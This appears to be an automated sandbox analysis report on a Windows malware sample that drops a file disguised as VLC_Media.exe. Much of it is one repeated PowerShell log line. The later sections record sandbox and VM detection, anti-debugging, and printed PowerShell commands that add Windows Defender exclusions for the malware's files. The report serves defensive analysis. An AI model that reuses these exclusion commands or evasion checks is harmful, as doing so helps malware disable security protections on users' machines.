                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            Source: Yara match	File source: 18fvs4AVae.exe, type: SAMPLE
                            Source: Yara match	File source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPE
                            Source: Yara match	File source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match	File source: C:\ProgramData\VLC_Media.exe, type: DROPPED
                            Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: 18fvs4AVae.exe, 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
                            Source: 18fvs4AVae.exe, VLC_Media.exe.0.dr	Binary or memory string: SBIEDLL.DLLINFO
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Memory allocated: DD0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Memory allocated: 1A770000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Window / User API: threadDelayed 4013
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Window / User API: threadDelayed 5822
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6743
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3112
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7634
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2021
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6906
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2784
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7203
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2277
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe TID: 1892	Thread sleep time: -34126476536362649s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656	Thread sleep time: -6456360425798339s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832	Thread sleep count: 7634 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep count: 2021 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep time: -4611686018427385s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172	Thread sleep count: 6906 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172	Thread sleep count: 2784 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4456	Thread sleep count: 7203 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1020	Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316	Thread sleep count: 2277 > 30
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Thread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
                            Source: VLC_Media.exe.0.dr	Binary or memory string: vmware
                            Source: 18fvs4AVae.exe, 00000000.00000002.2977632965.000000001B480000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Process information queried: ProcessInformation

                            Anti Debugging

                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Code function: 0_2_00007FFD9B896E61 CheckRemoteDebuggerPresent,0_2_00007FFD9B896E61
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Process queried: DebugPort
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Process token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Memory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
                            Source: C:\Users\user\Desktop\18fvs4AVae.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'
